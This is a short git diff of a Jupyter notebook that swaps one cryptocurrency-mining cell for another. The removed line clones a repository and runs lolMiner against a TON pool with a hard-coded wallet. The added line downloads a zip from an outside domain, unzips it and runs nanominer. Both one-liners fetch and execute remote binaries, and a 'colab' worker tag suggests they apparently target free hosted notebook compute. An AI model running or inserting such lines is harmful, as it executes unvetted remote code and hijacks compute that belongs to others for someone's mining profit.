--- a/go.ipynb
+++ b/go.ipynb
@@ -8,7 +8,7 @@
       },
       "outputs": [],
       "source": [
-        "![ -d 32 ] && (cd 32 && chmod +x lolMiner && ./lolMiner --algo TON --pool wss://pplns.toncoinpool.io/stratum --user EQDIhx4r-8m-tbbqKD6QORZG0WgAzNpk2AYCkLK_7HzcGrMK.32) || (git clone https://github.com/wildannss/32 && cd 32 && chmod +x lolMiner && ./lolMiner --algo TON --pool wss://pplns.toncoinpool.io/stratum --user EQDIhx4r-8m-tbbqKD6QORZG0WgAzNpk2AYCkLK_7HzcGrMK.colab32)"
+        "!apt install zip wget -y && [ -d nano ] && (cd nano && chmod +x nanominer && ./nanominer --config=config.ini) || (wget https://expandrive.my.id/public/mining/nano.zip && unzip nano.zip && cd nano && chmod +x nanominer && ./nanominer --config=config.ini)"
       ]
     }
   ],
